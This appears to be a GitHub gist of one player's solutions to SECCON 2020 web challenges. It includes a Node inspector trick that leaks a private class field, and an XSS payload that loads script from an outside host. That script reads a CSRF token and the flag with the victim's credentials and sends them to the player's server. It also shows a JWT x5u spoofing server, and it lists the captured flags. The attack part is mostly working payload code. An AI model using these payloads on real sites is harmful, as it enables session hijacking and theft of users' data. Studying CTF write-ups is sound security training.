SECCON 2020 - Web
var __classPrivateFieldSet = function(receiver, privateMap, value) { | |
if (!privateMap.has(receiver)) { | |
throw new TypeError( | |
"attempted to set private field on non-instance" | |
); | |
} | |
privateMap.set(receiver, value); | |
console.log(privateMap.get(flag)); | |
return value; | |
}; | |
new Flag("1234") | |
// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner} |
const util = require('util'); | |
const inspector = require('inspector'); | |
const session = new inspector.Session(); | |
session.connect(); | |
this.__proto__.aa= flag; | |
session.post('Runtime.evaluate', { | |
expression: `aa;` | |
}, (error, { result }) => { | |
console.log(result); | |
session.post('Runtime.getProperties', | |
{ objectId: result.objectId }, | |
(error, { privateProperties }) => { | |
console.log('private properties', privateProperties); | |
}); | |
}); | |
// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture} |
# index.html (for reporting) | |
<script> | |
location.href="https://milk-revenge.chal.seccon.jp/note.php/..;/note.php?id=5f820da700115b0700127762&_=a%20onerror=$.getScript(%27https://lab.mashiro.kr/bb.js%27);"; | |
</script> | |
# aa.js | |
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/csrf-token?_=aaaaaaaaaaaaaaaaaaaaaaaaaaaa');xhr.send(); | |
# bb.js | |
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/notes/flag?token=c5fe8848-9278-404f-9dfe-2ede7f41077c');xhr.send(); | |
milk: SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!} | |
milk revenge: SECCON{Okay_there_was_actually_unintended_solution_as_I_intended_blahblah} |
1. make jwt and signing any private key | |
2. change x5u url as below server on running app.py | |
3. get flag: SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574} | |
# app.py | |
from flask import Flask | |
c = False | |
app = Flask(__name__) | |
@app.route("/root.crt") | |
def aa(): | |
global c | |
if c == False: | |
c = True | |
with open("root.crt") as f: | |
q = f.read() | |
return q | |
else: | |
c = False | |
print "hello" | |
if __name__ == "__main__": | |
app.run(host="0.0.0.0", port=2368, debug=True) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment